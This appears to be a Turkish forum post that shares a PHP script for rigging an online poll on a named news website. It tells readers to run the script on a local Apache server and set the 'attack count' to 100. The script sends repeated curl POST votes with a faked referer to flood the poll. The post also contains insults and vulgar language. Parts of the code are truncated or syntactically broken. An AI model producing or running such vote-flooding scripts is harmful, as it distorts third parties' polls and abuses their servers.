1. 901.
    0
    BEYLER HERKES CHROME ve LOCALHOST kursun.. Localhost dediğimiz şey php çalıştıracak bir serverdır cahil binler. Örn:Apache Bu kodu kaydedip chrome da sağ üstte ayar işareti var. Ona tıklayıp Yeni Gizli Pencerereden http://localhost/bukod.php girin ve atak sayısını 100 yapın millet anket gibertmesi görsün

    Kod:

    <?php
    /* yaraktaki ugurlu kil
    D3J4-Vu
    • /
    @ini_set('max_execution_time', 0);
    function dayangec($adet)
    {
    for($i=0;$i<$adet;$i++)
    {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, " http://www.diyarinsesi.or...rtiden-olacak-55.htm" ;);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_REFERER, "yahoobot".$i);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "selected=s_11&submit="Anketi Oyla"");
    $sonuc = curl_exec($ch);
    if($i==$adet-1)
    {
    echo "Bitti!<br><hr width='100%'>";
    }
    }
    }
    echo"
    <div style='margin:-10 -10 -10 -10; align:top; position:fixed; width:100%; height:100px; background:gray; border:2px solid #ddd;'>
    <form action='' method='get'>
    Atak Sayısı:<input type='text' name='adet'>
    <br>
    <input type='submit' name='dayan' value='Saldir'>
    </form>
    </div>

    </div>
    &nbsp;
    <div style='margin-top:2%; padding-top:2%;'>
    ";
    if((isset($_GET['adet'])))
    {
    dayangec($_GET['adet']);
    }
    ?>
    ···
   tümünü göster